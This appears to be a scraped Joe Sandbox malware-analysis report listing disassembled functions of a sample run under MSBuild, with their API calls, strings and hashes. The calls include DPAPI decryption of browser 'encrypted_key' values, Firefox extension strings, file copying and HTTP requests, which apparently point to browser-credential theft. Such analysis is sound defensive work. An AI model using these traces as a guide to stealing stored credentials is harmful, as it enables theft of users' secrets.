                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                                                      • API String ID: 591506033-2861137601
                                                                                                                                                                                                                      • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                                                                                      • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                                                                                                                                      Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                      • String ID: =A
                                                                                                                                                                                                                      • API String ID: 3183270410-2399317284
                                                                                                                                                                                                                      • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                                                                                      • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                                                                                                                                      Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 211194620-0
                                                                                                                                                                                                                      • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                                                                                      • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                                                                                                                      Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                      • API String ID: 161838763-3310892237
                                                                                                                                                                                                                      • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                                                                                                                      • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                                                                                                                      Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                                                                                        • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                                                                                                                        • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                                                                                                                        • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                                                                                                                        • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                                                                                                                        • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                                                                        • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                                                                                        • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                      • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                                      • API String ID: 2311102621-738592651
                                                                                                                                                                                                                      • Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                                                                                                                                      • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                                                                                                                                      Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                      • String ID: nzA
                                                                                                                                                                                                                      • API String ID: 2104210347-1761861442
                                                                                                                                                                                                                      • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                                                                                                                      • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                                                                                                                                      Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                        • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                      • String ID: ERROR$ERROR
                                                                                                                                                                                                                      • API String ID: 3086566538-2579291623
                                                                                                                                                                                                                      • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                                                                                                                      • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                                                                                                                                                      Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
